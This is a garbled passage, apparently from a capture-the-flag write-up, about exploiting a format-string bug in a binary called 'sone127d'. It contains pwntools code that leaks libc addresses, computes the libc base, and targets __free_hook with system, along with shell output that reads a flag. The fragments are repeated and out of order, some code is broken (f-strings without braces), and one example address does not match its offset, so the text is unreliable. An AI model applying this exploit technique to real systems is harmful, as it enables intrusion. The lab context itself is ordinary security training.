Sone-127 2021 -

low = free_hook & 0xffff high = (free_hook >> 16) & 0xffff diff = (high - low) % 0x10000

> download sh.txt /bin/sh $ id uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) $ cat /flag.txt FLAGSONE_127_2021_4c7f5b Success! #!/usr/bin/env python3 # -*- coding: utf-8 -*- SONE-127 2021

printf(user_input); Using objdump -d sone127d | grep -i printf : low = free_hook & 0xffff high = (free_hook

if __name__ == '__main__': main()

def leak_libc(io): io.sendlineafter(b'> ', b'echo %7$p') io.recvuntil(b'echo ') leak = int(io.recvline().strip(), 16) log.success(f'Leaked address: hex(leak)') # __libc_start_main+231 is the usual location we see; adjust if needed libc_start_main_ret = leak - 231 libc_base = libc_start_main_ret - libc.sym['__libc_start_main'] log.info(f'Libc base: hex(libc_base)') return libc_base SONE-127 2021

| Symbol | Offset (hex) | Address (example) | |-----------------|--------------|-------------------| | system | 0x4f550 | 0x7f5c190f550 | | __free_hook | 0x3ed8e8 | 0x7f5c193ed8e8 | | /bin/sh string| 0x1b75aa | 0x7f5c191b75aa | Use pwntools : libc = ELF('libc-2.31.so') system_addr = libc.symbols['system'] + libc_base free_hook = libc.symbols['__free_hook'] + libc_base binsh = next(libc.search(b'/bin/sh')) + libc_base 5.3 Write system into __free_hook The binary uses malloc / free internally for the upload / download commands. By uploading a large payload we can control a heap chunk and then use the format‑string write to place the system address at __free_hook .